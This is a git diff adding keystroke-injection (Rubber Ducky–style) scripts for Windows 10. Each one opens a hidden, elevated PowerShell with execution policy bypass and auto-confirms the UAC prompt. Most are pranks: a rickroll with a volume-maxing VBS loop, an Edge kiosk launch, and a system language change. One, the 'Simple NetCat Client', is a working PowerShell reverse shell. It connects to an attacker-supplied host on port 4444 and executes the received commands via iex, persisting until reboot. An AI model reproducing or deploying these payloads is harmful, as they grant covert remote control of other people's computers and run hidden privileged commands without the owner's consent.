Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to keep the volume maxed. +STRING cmd +ENTER +STRING copy con volup.vbs +ENTER +STRING do +ENTER +STRING Set WshShell = CreateObject("WScript.Shell") +ENTER +STRING WshShell.SendKeys(chr(&hAF)) +ENTER +STRING WScript.Sleep 10 +ENTER +STRING loop +ENTER +CTRL z +ENTER +STRING start volup.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + +REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. +GUI r +DELAY 1000 +STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ +ENTER +DELAY 2000 +STRING f + + + diff --git a/Set US Keyboard & System Language.txt b/Set US Keyboard & System Language.txt new file mode 100644 index 0000000..1866494 --- /dev/null +++ b/Set US Keyboard & System Language.txt @@ -0,0 +1,30 @@ +REM Title: Set System Language +REM Author: @beigeworm +REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US). +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM set system language to (example here is US) +STRING Dism /online /Get-Intl +ENTER +DELAY 500 +STRING Set-WinSystemLocale en-US +ENTER +DELAY 500 +STRING Set-WinUserLanguageList en-US -force +ENTER +DELAY 500 +STRING exit +ENTER + diff --git a/Simple NetCat Client.txt b/Simple NetCat Client.txt new file mode 100644 index 0000000..d442d52 --- /dev/null +++ b/Simple NetCat Client.txt @@ -0,0 +1,28 @@ +REM Title: Simple NetCat Client +REM Author: @beigeworm +REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444). + +REM *SETUP* +REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM write out the main Powershell code. +STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444) +STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) +STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) +ENTER \ No newline at end of file diff --git a/Start Windows-93 (parody edition).txt b/Start Windows-93 (parody edition).txt new file mode 100644 index 0000000..4c8015e --- /dev/null +++ b/Start Windows-93 (parody edition).txt @@ -0,0 +1,33 @@ +REM Title: Start Windows-93 (parody edition) +REM Author: @beigeworm +REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open cmd and kill edge. +GUI r +DELAY 500 +STRING cmd +DELAY 200 +CTRL-SHIFT ENTER +DELAY 1000 +ALT y +DELAY 1000 +STRING taskkill /F /IM msedge.exe /T > nul +DELAY 100 +ENTER +DELAY 500 +STRING exit +ENTER + +REM open edge and fullscreen. +DELAY 500 +GUI r +DELAY 500 +STRING msedge -kiosk www.windows93.net +DELAY 100 +ENTER +DELAY 1000 +F11 \ No newline at end of file